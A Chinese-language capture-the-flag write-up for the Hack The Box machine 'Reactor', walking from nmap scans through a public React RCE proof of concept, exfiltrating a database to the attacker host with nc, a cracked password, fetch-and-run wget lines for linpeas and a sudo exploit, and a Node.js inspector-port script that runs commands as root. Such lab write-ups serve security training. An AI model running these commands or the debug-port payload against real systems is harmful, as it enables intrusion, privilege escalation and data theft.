HTB - Reactor - 技术栈

前言

···

最近太忙嘞，忙里抽空打了一下，望各位见谅

···

复制代码

10.129.4.61

nmap扫描

复制代码

sudo nmap --top-ports 10000 10.129.4.61 --min-rate=1000 -oA ips_quick_TCP_nmapscan && sudo nmap --top-ports 10000 10.129.4.61 --min-rate=1000 -sU -oA ips_quick_UDP_nmapscan && nmap -p- 10.129.4.61 -oA ips_full_TCP_nmapscan --min-rate=1000 && sudo nmap -p- 10.129.4.61 -sU -oA ips_full_UDP_nmapscan --min-rate=1000

nmap详细扫描

复制代码

nmap -sV -sC -p22,3000 --min-rate=1000 10.129.4.61 -vv -Pn

我们进一步查看3000端口，访问

复制代码

http://10.129.4.61:3000/

查明中间件版本，发现React，该框架在2025年爆出RCE漏洞

我们查找道POC

复制代码

https://github.com/ThemeHackers/CVE-2025-55182

使用POC

复制代码

python CVE-2025-55182.py -u http://10.129.4.61:3000/

开始反连

复制代码

python CVE-2025-55182.py -u http://10.129.4.61:3000/  --exploit

发现reactor.db，传输文件道kali

复制代码

nc -lvnp 8888 > reactor.db
nc -q 0 10.10.14.240 8888 < reactor.db

查看文件

破解密码

获取engineer用户

复制代码

engineer:reactor1

上linpeas

复制代码

wget http://10.10.14.240/linpeas.sh && chmod 755 linpeas.sh && ./linpeas.sh

尝试sudo提权，提权失败·

复制代码

wget http://10.10.14.240/sudo_Pwned_1_9_14-1_9_17.sh && chmod 755 sudo_Pwned_1_9_14-1_9_17.sh && ./sudo_Pwned_1_9_14-1_9_17.sh

我们发现9229开启了node的调试端口

访问端口查看调试端口后面的序列

复制代码

curl http://127.0.0.1:9229/json

我们使用ws链接调试端口，并执行恶意命令

复制代码

const WebSocket = require('ws');

const ws = new WebSocket('ws://127.0.0.1:9229/5c0cfa64-f235-4c68-9b60-57251cead0a2'); //Change it to your ws

ws.on('open', function () {
    console.log('connected');

    // 执行 JS
    ws.send(JSON.stringify({
        id: 1,
        method: "Runtime.evaluate",
        params: {
            expression: `
                this.constructor.constructor('return process')()
                .mainModule.require('child_process')
                .execSync('id')
                .toString()
            `
        }
    }));
});

ws.on('message', function (data) {
    console.log(data.toString());
});

执行脚本

复制代码

npm install ws

ssh -L 9229:127.0.0.1:9229 engineer@10.129.4.61 -fN 

node nodejs_debug_port_RCE.js

到此已经完成root的任意命令执行。